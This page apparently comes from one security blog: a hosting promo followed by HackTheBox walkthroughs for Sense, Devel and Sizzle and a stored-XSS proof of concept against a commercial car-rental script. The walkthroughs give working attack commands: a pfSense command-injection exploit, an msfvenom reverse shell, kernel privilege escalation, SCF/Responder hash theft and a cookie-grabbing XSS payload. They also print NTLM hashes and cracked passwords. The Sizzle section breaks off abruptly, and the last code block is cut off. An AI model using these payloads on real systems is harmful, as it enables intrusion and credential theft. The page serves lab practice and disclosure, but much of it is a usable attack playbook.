Recommended Hosting Provider

Hi Guys,

Real-Life Experience –

In the last few months, I have gone through various blogs about the best hosting platform to use for blogging and also for high performance. I even did a few polls on every social platform, and in 90% of those polls Siteground was the winner. Although the following factors were all recommending Siteground to me, I thought of researching more:

  1. Google suggested – Siteground
  2. My Research suggested – Siteground
  3. Social platform polls suggested – Siteground
  4. My Mind – Take some more time

Basically, at that time I didn't have the money to buy the cheapest Siteground package, so I looked at other platforms that offer a trial period. Accordingly, I started working on various other platforms to gain practical knowledge, and later I found out that Siteground also offers a 30-day money-back guarantee: if you cancel your subscription at any time within 30 days, they refund your money without any questions.

Check it out : Best for beginners

Eventually, I purchased a starter pack for one of my clients and structured the blogging site accordingly.

Check it out : Best for Ecommerce

In the next 1-2-3 weeks I was not getting much traffic. At that time I thought maybe I was a mess!! I researched how to bring traffic and SEO optimization. Everywhere it was mentioned that it is paid, blah blah, but when I searched for the tool in my hosting platform, i.e. Siteground, I found it for free, because all of them come built into your package. I was really amazed to see so many tools provided as built-in features of the package.

Check it out : Best for WP platform

I wish I could show you how much traffic I was able to grab by doing that, but I don't have my client's approval to show the graph.

I recommend to everyone who is working on blogging and knowledge-sharing platforms, or any platform where you need a hosting plan: please try Siteground, because as per my experience it's the best ❤

Thank You

# Follow upcoming blog – hacksayan.com

Regards, 

HackSayan

7th May 2020

How It Got Started

It's almost 4 years that I have been working in the Cyber Security domain, and in this span I got to know about a few good vulnerabilities while working on various engagements. So I thought of penning them down somewhere as my own repo, and that was the main motive behind creating hacksayan.wordpress.com; gradually I thought of migrating from the free to a paid service 🙂 So I recently migrated here, and I will keep updating this blog with my vulnerability findings for now, and later will see if I can add more.

www.hacksayan.com

References

Owned CVE IDs

  • CVE-2018-6934

  • CVE-2018-10110

  • CVE-2018-8772

  • CVE-2018-6870

 

Security is not a product, but a process !!

HTB Machine Walkthrough – Sense

###################################################################

# Machine Name – Sense

# Machine IP – 10.10.10.60

# OS Type – FreeBSD (pfSense)

# Date – 09.05.2020

# Walk-through Author – Sayan Chatterjee

# Follow upcoming blog – hacksayan.com

###################################################################

 

Please follow the below steps with me to get user.txt and root.txt :

  • Nmap :

root@kali:~/Desktop/HTB/Linux/Sense# nmap -Pn -sC -sV -O 10.10.10.60 --script vuln -oA SenseInitialVuln

Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-26 10:16 EDT
Nmap scan report for 10.10.10.60
Host is up (0.17s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http lighttpd 1.4.35
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-passwd: ERROR: Script execution failed (use -d to debug)
|_http-server-header: lighttpd/1.4.35
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
443/tcp open ssl/http lighttpd 1.4.35
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /javascript/sorttable.js: Secunia NSI
| /changelog.txt: Interesting, a changelog.
|_ /tree/: Potentially interesting folder
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| ssl-ccs-injection:
| VULNERABLE:
| SSL/TLS MITM vulnerability (CCS Injection)
| State: VULNERABLE
| Risk factor: High
| OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
| does not properly restrict processing of ChangeCipherSpec messages,
| which allows man-in-the-middle attackers to trigger use of a zero
| length master key in certain OpenSSL-to-OpenSSL communications, and
| consequently hijack sessions or obtain sensitive information, via
| a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|
| References:
| http://www.cvedetails.com/cve/2014-0224
| http://www.openssl.org/news/secadv_20140605.txt
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA
| Modulus Type: Non-safe prime
| Modulus Source: RFC5114/1024-bit DSA group with 160-bit prime order subgroup
| Modulus Length: 1024
| Generator Length: 1024
| Public Key Length: 1024
| References:
|_ https://weakdh.org
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: VULNERABLE
| IDs: CVE:CVE-2014-3566 OSVDB:113251
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA
| References:
| http://osvdb.org/113251
| https://www.imperialviolet.org/2014/10/14/poodle.html
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|_ https://www.openssl.org/~bodo/ssl-poodle.pdf
|_sslv2-drown:
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|general purpose
Running (JUST GUESSING): Comau embedded (92%), FreeBSD 8.X (85%), OpenBSD 4.X (85%)
OS CPE: cpe:/o:freebsd:freebsd:8.1 cpe:/o:openbsd:openbsd:4.0
Aggressive OS guesses: Comau C4G robot control unit (92%), FreeBSD 8.1 (85%), OpenBSD 4.0 (85%)
No exact OS matches for host (test conditions non-ideal).

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 176.72 seconds

  • Exploitation :
  1. We tried various ways to get anything out of ports 80 and 443, but nothing worked apart from the following gobuster run. It turned up a text file that gave us a username, and we collected the default credentials for pfSense from the internet.
    • gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://10.10.10.60 -k -x php,txt,conf
    • Found: https://10.10.10.60/system-users.txt

      ####Support ticket###
      Please create the following user
      username: Rohit
      password: company defaults

      The default credentials for a pfSense® firewall are: Username: admin. Password: pfsense.

      Credentials that worked: rohit / pfsense (the support ticket names the user, and "company defaults" turned out to mean the vendor default password)

  2. Once logged in, the dashboard showed that the pfSense version is 2.1.3.
  3. Next we searched searchsploit for known vulnerabilities in that version and got this:
    • root@kali:~/Desktop/HTB/Linux/Sense# searchsploit pf sense
    • ------------------------------------------------------------------ ----------------------------------------
      Exploit Title | Path (/usr/share/exploitdb/)
      ------------------------------------------------------------------ ----------------------------------------
      pfSense - 'interfaces.php?if' Cross-Site Scripting | exploits/hardware/remote/35071.txt
      pfSense - 'pkg.php?xml' Cross-Site Scripting | exploits/hardware/remote/35069.txt
      pfSense - 'pkg_edit.php?id' Cross-Site Scripting | exploits/hardware/remote/35068.txt
      pfSense - 'status_graph.php?if' Cross-Site Scripting | exploits/hardware/remote/35070.txt
      pfSense - (Authenticated) Group Member Remote Command Execution ( | exploits/unix/remote/43193.rb
      pfSense 2 Beta 4 - 'graph.php' Multiple Cross-Site Scripting Vuln | exploits/php/remote/34985.txt
      pfSense 2.0.1 - Cross-Site Scripting / Cross-Site Request Forgery | exploits/php/webapps/23901.txt
      pfSense 2.1 build 20130911-1816 - Directory Traversal | exploits/php/webapps/31263.txt
      pfSense 2.2 - Multiple Vulnerabilities | exploits/php/webapps/36506.txt
      pfSense 2.2.5 - Directory Traversal | exploits/php/webapps/39038.txt
      pfSense 2.3.1_1 - Command Execution | exploits/php/webapps/43128.txt
      pfSense 2.3.2 - Cross-Site Scripting / Cross-Site Request Forgery | exploits/php/webapps/41501.txt
      pfSense 2.4.1 - Cross-Site Request Forgery Error Page Clickjackin | exploits/php/remote/43341.rb
      pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection | exploits/php/webapps/43560.py
      pfSense Community Edition 2.2.6 - Multiple Vulnerabilities | exploits/php/webapps/39709.txt
      pfSense Firewall 2.2.5 - Config File Cross-Site Request Forgery | exploits/php/webapps/39306.html
      pfSense Firewall 2.2.6 - Services Cross-Site Request Forgery | exploits/php/webapps/39695.txt
      pfSense UTM Platform 2.0.1 - Cross-Site Scripting | exploits/freebsd/webapps/24439.txt

      The entry that matches our version (2.1.3) is the authenticated command injection in status_rrd_graph_img.php, fixed in 2.1.4. We already have a valid login, so that is the one to use.
  4. Now we exploited that vulnerability and got a shell. Start the listener first, then run the exploit script with our credentials and the listener's address:
    • nc -nlvp 1234
    • python3 43560.py --rhost 10.10.10.60 --lhost 10.10.14.28 --lport 1234 --username rohit --password pfsense

  • Flags :
    1. User – 87###
    2. Root – d0###
  • Tools Used :
    1. nmap
    2. gobuster
    3. searchsploit
    4. python
    5. nc
  • Machine Summary :
    1. Basic & Privilege Escalation
      • OS Type – FreeBSD (pfSense)
      • OS Version – FreeBSD pfSense.localdomain 8.3-RELEASE-p16 FreeBSD 8.3-RELEASE-p16 #0: Thu May 1 16:19:14 EDT 2014 root@pf2_1_1_amd64.pfsense.org:/usr/obj.amd64/usr/pfSensesrc/src/sys/pfSense_SMP.8 amd64
      • Exploit Service – https (pfSense 2.1.3 web GUI, authenticated as rohit)
      • Exploit Payload – pfSense < 2.1.4 – 'status_rrd_graph_img.php' Command Injection (exploits/php/webapps/43560.py); reference: https://www.exploit-db.com/exploits/42315
      • Note – the pfSense web GUI runs as root, so the injected command lands directly as root and both flags come from the same shell; there is no separate privilege-escalation step.
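The credential-then-version flow above, automated, as an added example (not code from the write-up or from the pfSense project): fetch the login page, pull the __csrf_magic hidden field the pfSense login form carries, post the recovered credentials, read the version string from the dashboard, and decide whether it falls below 2.1.4, the fixed version named in the searchsploit entry. The form field names (usernamefld, passwordfld, login), the __csrf_magic field and the "2.1.3-RELEASE" dashboard format are assumptions about pfSense 2.x markup; the sample pages inside the block are constructed so the parsing runs offline.

```python
"""Log into pfSense with recovered credentials and gate a version-bound exploit.

Added example for the Sense write-up; not code from the write-up or from pfSense.
Assumptions (pfSense 2.x markup): the login form posts usernamefld, passwordfld
and login, carries a hidden __csrf_magic token, and the dashboard prints the
version as e.g. "2.1.3-RELEASE".
"""
import http.cookiejar
import re
import ssl
import sys
import urllib.parse
import urllib.request
from typing import Optional

CSRF_RE = re.compile(r"name=['\"]__csrf_magic['\"][^>]*value=['\"]([^'\"]+)['\"]")
VERSION_RE = re.compile(r"\b(\d+\.\d+(?:\.\d+)?)-RELEASE\b")

# Constructed sample pages standing in for the live box (offline check).
SAMPLE_LOGIN_PAGE = """<form method="post" action="/index.php">
<input type='hidden' name='__csrf_magic' value="sid:3f2c1d9e8b7a6c5d4e3f2a1b0c9d8e7f6a5b4c3d,1588929600" />
<input name="usernamefld" type="text"><input name="passwordfld" type="password">
<input type="submit" name="login" value="Login"></form>"""
SAMPLE_DASHBOARD = """<div id="system-information">Version 2.1.3-RELEASE (amd64)
built on Thu May 01 15:52:13 EDT 2014</div>"""


def csrf_token(html: str) -> Optional[str]:
    """Return the __csrf_magic value from a pfSense page, or None if absent."""
    m = CSRF_RE.search(html)
    return m.group(1) if m else None


def extract_version(html: str) -> Optional[str]:
    """Return the 'x.y.z' part of the first '<ver>-RELEASE' string on the page."""
    m = VERSION_RE.search(html)
    return m.group(1) if m else None


def version_tuple(v: str) -> tuple:
    return tuple(int(p) for p in v.split("."))


def is_affected(found: str, fixed_in: str) -> bool:
    """True when found < fixed_in, compared numerically (so 2.1.10 is not < 2.1.4)."""
    a, b = version_tuple(found), version_tuple(fixed_in)
    n = max(len(a), len(b))
    return a + (0,) * (n - len(a)) < b + (0,) * (n - len(b))


def login_form(username: str, password: str, token: str) -> dict:
    """Field set the pfSense login handler expects (assumed names, see header)."""
    return {"__csrf_magic": token, "usernamefld": username,
            "passwordfld": password, "login": "Login"}


def fetch_version(base_url: str, username: str, password: str) -> Optional[str]:
    """Live flow: GET login page -> token -> POST credentials -> parse dashboard."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE          # lab box with a self-signed certificate
    opener = urllib.request.build_opener(
        urllib.request.HTTPCookieProcessor(http.cookiejar.CookieJar()),
        urllib.request.HTTPSHandler(context=ctx))
    page = opener.open(base_url + "/index.php", timeout=15).read().decode(errors="replace")
    token = csrf_token(page)
    if token is None:
        raise RuntimeError("no __csrf_magic field on the login page")
    body = urllib.parse.urlencode(login_form(username, password, token)).encode()
    dash = opener.open(base_url + "/index.php", data=body, timeout=15).read().decode(errors="replace")
    return extract_version(dash)


if __name__ == "__main__":
    if len(sys.argv) == 4:      # python3 pfsense_check.py https://10.10.10.60 rohit pfsense
        ver = fetch_version(sys.argv[1], sys.argv[2], sys.argv[3])
    else:                       # offline demo on the constructed sample pages
        ver = extract_version(SAMPLE_DASHBOARD)
    state = "vulnerable" if ver and is_affected(ver, "2.1.4") else "not in affected range"
    print(f"version {ver}: {state}")
```

The numeric comparison matters more than it looks: a string compare would call 2.1.10 older than 2.1.4 and fire the exploit against a patched box. Peer verification is disabled only because the lab box serves its own certificate; against anything real, pin the expected certificate instead.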

 

Thank You !!

HTB Machine Walkthrough – Devel

###################################################################

# Devel – Windows Os

# Date: 27.07.2019

# Walkthrough Author: Sayan Chatterjee

#########################################################################

Please follow the below commands to get user.txt and root.txt :

  1. Perform nmap scan on 10.10.10.5
    • Command : nmap -sC -sV -oA Devel 10.10.10.5

2. Port 21: Check the FTP connection with the anonymous account. It works, and you will see that you can upload and download files to and from the remote server using FileZilla.

Steps to Exploit:

  1. Open a terminal.
  2. Type msfconsole (starting Metasploit).
  3. In another terminal, create the reverse shell with msfvenom (this is a normal shell command, not an msf prompt command):
    • msfvenom -p windows/meterpreter/reverse_tcp LHOST=<AttackerIp> LPORT=4444 -f aspx -o reversetcpshell.aspx
  4. Start the handler in Metasploit before triggering the payload; otherwise the callback has nothing to connect to:
    msf > use exploit/multi/handler
    msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
    msf exploit(multi/handler) > set LHOST 10.10.14.6
    msf exploit(multi/handler) > set LPORT 4444
    msf exploit(multi/handler) > exploit
  5. Then transfer reversetcpshell.aspx to the victim's system using FileZilla over the anonymous FTP login. Because the FTP directory is the web server's document root, you can then open the uploaded file from the web browser; that executes the backdoor. Go back to Metasploit and wait for the meterpreter session to be created.
  6. Once the meterpreter session is created, type 'sysinfo' to see the machine details.
  7. Then I ran the post module "Multi Recon Local Exploit Suggester", which suggests local Metasploit exploits the session may be vulnerable to, as candidates for the privilege-escalation phase:
    • msf exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
    • msf post(multi/recon/local_exploit_suggester) > options
    • msf post(multi/recon/local_exploit_suggester) > set SESSION 1
    • msf post(multi/recon/local_exploit_suggester) > run
  8. Wonderful!! The suggester lists several local exploits the target appears vulnerable to, so we have more than a handful to try.
  9. I tried the first one and couldn't get it to work, so we move on to the second one, ms10_015_kitrap0d. Microsoft's security bulletin MS10-015 describes it as a Windows kernel bug that lets a local user run arbitrary code in kernel mode.

    Let's continue exploiting the machine by loading that privilege-escalation module in Metasploit (it needs a 32-bit meterpreter session, which the x86 windows/meterpreter payload above provides).

  10. Try these:
    • msf post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_015_kitrap0d
    • msf exploit(windows/local/ms10_015_kitrap0d) > show options
    • msf exploit(windows/local/ms10_015_kitrap0d) > set SESSION 1
    • msf exploit(windows/local/ms10_015_kitrap0d) > run
  11. If you get the elevated shell, search for user.txt and root.txt.

###########################################################################

HTB Machine Walkthrough – Sizzle

#########################################################################
# Sizzle - Windows Os
# Date: 25.07.2019
# Walkthrough Author: Sayan Chatterjee

Quick Summary

Hey guys, today Sizzle retired and here's my write-up about it. Sizzle was a great machine; everything about it was great. It was very realistic, fun and of course challenging, as it was rated Insane. Personally one of my favourites and one of the best Active Directory boxes I have ever solved. It starts by getting write access to a directory in an SMB share; a simple SCF file attack with Responder and john gives a password for a user. With that password I could generate a certificate request, get a certificate and then a WinRM session. After that comes the most challenging part of the box: bypassing antivirus, Kerberoasting and privilege escalation, but before doing that we will take a look at an unintended way first. That was the box in a nutshell. It's a Windows box and its IP is 10.10.10.103; I added it to /etc/hosts as sizzle.htb. Let's jump right in!

Nmap

As always we will start with nmap to scan for open ports and services:

nmap -sV -sT -sC sizzle.htb

Full Output :
# Nmap 7.70 scan initiated Fri May 31 19:41:35 2019 as: nmap -sV -sT -sC -o nmapinitial sizzle.htb
Nmap scan report for sizzle.htb (10.10.10.103)
Host is up (0.15s latency).
Not shown: 987 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
|_ssl-date: 2019-05-31T17:44:44+00:00; -6s from scanner time.
443/tcp open ssl/http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
|_ssl-date: 2019-05-31T17:44:41+00:00; -6s from scanner time.
| tls-alpn:
| h2
|_ http/1.1
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
|_ssl-date: 2019-05-31T17:44:43+00:00; -5s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
|_ssl-date: 2019-05-31T17:44:42+00:00; -6s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
|_ssl-date: 2019-05-31T17:44:41+00:00; -6s from scanner time.
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.70%I=7%D=5/31%Time=5CF1678A%P=i686-pc-linux-gnu%r(DNSVer
SF:sionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x0
SF:4bind\0\0\x10\0\x03");
Service Info: Host: SIZZLE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -5s, deviation: 0s, median: -6s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2019-05-31 19:44:44
|_ start_date: 2019-05-31 12:06:07

We got a lot of ports: FTP on 21, DNS on 53, HTTP on 80, SMB and LDAP. We also see that the domain is HTB.LOCAL and the commonName is sizzle.htb.local, so I added that to /etc/hosts too. Anonymous authentication on FTP was allowed, but there was nothing there, so I will skip that.

HTTP

I checked the HTTP server; the index only had a simple gif. So I ran gobuster:

=====================================================
Gobuster v2.0.0              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://sizzle.htb/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirb/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 10s
=====================================================
2019/05/31 19:51:59 Starting gobuster
=====================================================
/aspnet_client (Status: 301)
/certenroll (Status: 301)
/Images (Status: 301)
/images (Status: 301)
/index.html (Status: 200)
=====================================================
2019/05/31 19:53:24 Finished
=====================================================

/certenroll sounds interesting, but unfortunately it's a 403. It's time to check SMB.

SMB, SCF File Attack, amanda's Credentials

First we need to know the shares; we can use smbclient to list them:

smbclient --list //sizzle.htb/ -U ""

I noticed that there was a share for Active Directory Certificate Services, so most likely /certsrv will be on the web server. Try http://sizzle.htb/certsrv. Yes, it was there, and we need credentials.

Back to SMB: the only share I could access anonymously was Department Shares. Connect to it and list it (smbclient's --list/-L lists a host's shares; to browse inside a share you connect to it and run ls):

smbclient "//sizzle.htb/Department Shares" -U "" -N
smb: \> ls

It had a lot of directories, and I could write to two of them: ZZ_ARCHIVE and Users/Public. We are looking for credentials. Since we can write to one of the directories, we can possibly apply an SCF file attack: an SCF (Shell Command File) whose IconFile points at a UNC path makes Explorer authenticate to that host over SMB as soon as the folder is rendered, without the user opening anything. We are going to put an SCF file in Users/Public. It looks like this (10.10.xx.xx is my own IP; the leading @ in the file name just makes it sort first in the listing):

# cat @hacksayan.scf
[Shell]
Command=2
IconFile=\\10.10.xx.xx\share\hacksayan.ico
[Taskbar]
Command=ToggleDesktop

Then we will run Responder. Whenever a user browses that directory, his machine will automatically try to connect to my box through SMB, and that's when Responder catches the NTLM challenge-response hash. Go to \Users\Public and place the SCF file:

smb: \Users\Public\> put @hacksayan.scf

Then turn on Responder:

root@kali:~# responder -wrf --lm -v -I tun0

Responder caught a hash for a user called amanda. Let's crack it with john:

root@kali:~# john --wordlist=/usr/share/wordlists/rockyou.txt amanda.hash

The password is Ashare1972.

Requesting a Certificate, WinRM Session as amanda

I tried to access certenroll as amanda and it worked fine:

smbclient //sizzle.htb/certenroll -U amanda

So I went to /certsrv and used amanda's credentials to authenticate. Now it's time to get a certificate. But wait a second, what's the certificate for anyway? A full nmap scan shows that the WinRM ports are open:

nmap -p- -T5 -vvv --max-retries 1 sizzle.htb

Full Output :
# Nmap 7.70 scan initiated Fri May 31 20:22:10 2019 as: nmap -p- -T5 -vvv -o nmapfull --max-retries 1 sizzle.htb
Warning: 10.10.10.103 giving up on port because retransmission cap hit (1).
Nmap scan report for sizzle.htb (10.10.10.103)
Host is up, received echo-reply ttl 127 (0.11s latency).
Scanned at 2019-05-31 20:22:10 EET for 220s
Not shown: 65506 filtered ports
Reason: 65506 no-responses
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 127
53/tcp open domain syn-ack ttl 127
80/tcp open http syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
443/tcp open https syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
636/tcp open ldapssl syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
3269/tcp open globalcatLDAPssl syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
5986/tcp open wsmans syn-ack ttl 127
9389/tcp open adws syn-ack ttl 127
47001/tcp open winrm syn-ack ttl 127
49664/tcp open unknown syn-ack ttl 127
49665/tcp open unknown syn-ack ttl 127
49667/tcp open unknown syn-ack ttl 127
49669/tcp open unknown syn-ack ttl 127
49679/tcp open unknown syn-ack ttl 127
49682/tcp open unknown syn-ack ttl 127
49683/tcp open unknown syn-ack ttl 127
49686/tcp open unknown syn-ack ttl 127
49689/tcp open unknown syn-ack ttl 127
49701/tcp open unknown syn-ack ttl 127
54195/tcp open unknown syn-ack ttl 127
54204/tcp open unknown syn-ack ttl 127
nmap -p 5985,5986 -sV -sT -sC sizzle.htb

Full Output :
# Nmap 7.70 scan initiated Fri May 31 20:27:46 2019 as: nmap -p 5985,5986 -sV -sT -sC -o nmapwinrm sizzle.htb
Nmap scan report for sizzle.htb (10.10.10.103)
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername:<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2019-05-31T17:56:26
|_Not valid after: 2020-05-30T17:56:26
|_ssl-date: 2019-05-31T18:28:30+00:00; -6s from scanner time.
| tls-alpn:
| h2
|_ http/1.1
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -6s, deviation: 0s, median: -6s

Port 5985 uses HTTP while 5986 uses HTTPS. When I got amanda's credentials I tried to connect to port 5985 and couldn't, so we will do it through port 5986, and that's why we need a certificate (if you don't know how to connect through WinRM, we'll get to that later). We will generate a certificate request and a private key:

openssl req -newkey rsa:2048 -nodes -keyout request.key -out request.csr

Then we submit an advanced certificate request on the /certsrv portal, authenticated as amanda: paste the contents of request.csr and download the issued certificate (Base64 encoded). Now we can use WinRM, but what's WinRM?

Windows Remote Management (WinRM) is the Microsoft implementation of WS-Management Protocol, a standard Simple Object Access Protocol (SOAP)-based, firewall-friendly protocol that allows hardware and operating systems, from different vendors, to interoperate. The WS-Management protocol specification provides a common way for systems to access and exchange management information across an IT infrastructure. WinRM and Intelligent Platform Management Interface (IPMI), along with the Event Collector are components of the Windows Hardware Management features. –Microsoft

WinRM is not meant to be used from Linux, but luckily there's a Ruby library for it (the winrm gem). That's how we will connect. I used Alamot's shell and added the certificate and key to the connection:

# cat winrm.rb
#!/usr/bin/ruby
require 'winrm'

# Author: Alamot (interactive PowerShell loop); certificate transport added for Sizzle

conn = WinRM::Connection.new(
  endpoint: 'https://10.10.10.103:5986/wsman',
  transport: :ssl,
  client_cert: '/root/Desktop/HTB/boxes/sizzle/certs/certnew.cer',  # certificate issued by /certsrv
  client_key: '/root/Desktop/HTB/boxes/sizzle/certs/request.key',   # private key from the openssl req step
  :no_ssl_peer_verification => true                                 # the box uses its own CA, so skip peer verification
)

command = ""

conn.shell(:powershell) do |shell|
    until command == "exit\n" do
        # Build a PS-style prompt on the remote side: "PS user@HOST dir> "
        output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")
        print(output.output.chomp)
        command = gets
        break if command.nil?   # EOF on stdin
        output = shell.run(command) do |stdout, stderr|
            STDOUT.print stdout
            STDERR.print stderr
        end
    end
    puts "Exiting with code #{output.exitcode}"
end

And it worked:

# ./winrm.rb

whoami

htb\amanda

But there was no user.txt.

Stored NTLM Hashes, Secretsdump, Privilege Escalation

Through filesystem enumeration I found a file called file.txt in C:\Windows\System32. That file had NTLM hashes for all users!

PS htb\amanda@SIZZLE C:\> cat windows/system32/file.txt

Output :

krbtgt:502:aad3b435b51404eeaad3b435b51404ee:296ec447eee58283143efbd5d39408c8:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c718f548c75062ada93250db208d3178:::

Domain    User  ID  Hash
------    ----  --  ----
HTB.LOCAL Guest 501 -   
amanda:1104:aad3b435b51404eeaad3b435b51404ee:7d0516ea4b6ed084f3fdf71c47d9beb3:::
mrb3n:1105:aad3b435b51404eeaad3b435b51404ee:bceef4f6fe9c026d1d8dec8dce48adef:::
mrlky:1603:aad3b435b51404eeaad3b435b51404ee:bceef4f6fe9c026d1d8dec8dce48adef:::

Honestly I don't know how that got there; after resetting the machine the file was still there. I don't know if the creator made an unintended mistake, but anyway, let's see how we can use it. That Administrator hash was useless: I tried it with SMB, I cracked it, I tried psexec. It didn't work. I cracked mrlky's hash: the password was Football#7. I used it with secretsdump.py from impacket and got another Administrator hash:

#######################################################################################

Proof of Concept
=================
URL: https://www.phpscriptsmall.com/product/car-rental-script/
Attack Vector : User Name
Payload : <svg/onload=alert(document.cookie)>

Reproduction Steps:
------------------------------
1. Access the above URL
2. Click on "User Demo"
3. The application will be redirected to http://travelbookingscript.com/demo/taxibooking_new/index.php
4. Go to "Register" and create a new user
5. Now log into the application and click on "My Account"
6. Click on "Edit Profile" -> select "User Name" and inject <svg/onload=alert(document.cookie)>
7. The persistent XSS will be executed.
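Working with the file.txt dump from the Sizzle section above, as an added example (not code from the write-up and not impacket's): it parses pwdump/secretsdump-style lines into records, flags accounts that share an NT hash (mrb3n and mrlky do, so cracking one password cracks both), confirms the LM field is the empty-password value on every line, and checks a cracked candidate by recomputing the NT hash (MD4 over the UTF-16LE password) in plain Python, since hashlib only exposes MD4 when OpenSSL's legacy provider is loaded. The dump text is the one shown above; the two "Domain/User/ID/Hash" lines are not in pwdump format and are skipped.

```python
"""Parse an NTLM hash dump and verify cracked candidates by recomputing NT hashes.

Added example for the Sizzle write-up; not code from the write-up or from impacket.
NT hash = MD4(UTF-16LE(password)); MD4 is implemented here (RFC 1320) because
hashlib only exposes it when OpenSSL's legacy provider is loaded.
"""
import re
import struct
from collections import defaultdict

MASK = 0xFFFFFFFF
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of "": LM hashes are not stored

# The file.txt contents shown above (the two "Domain/User/ID/Hash" table lines do
# not match the pwdump format and are skipped by the parser).
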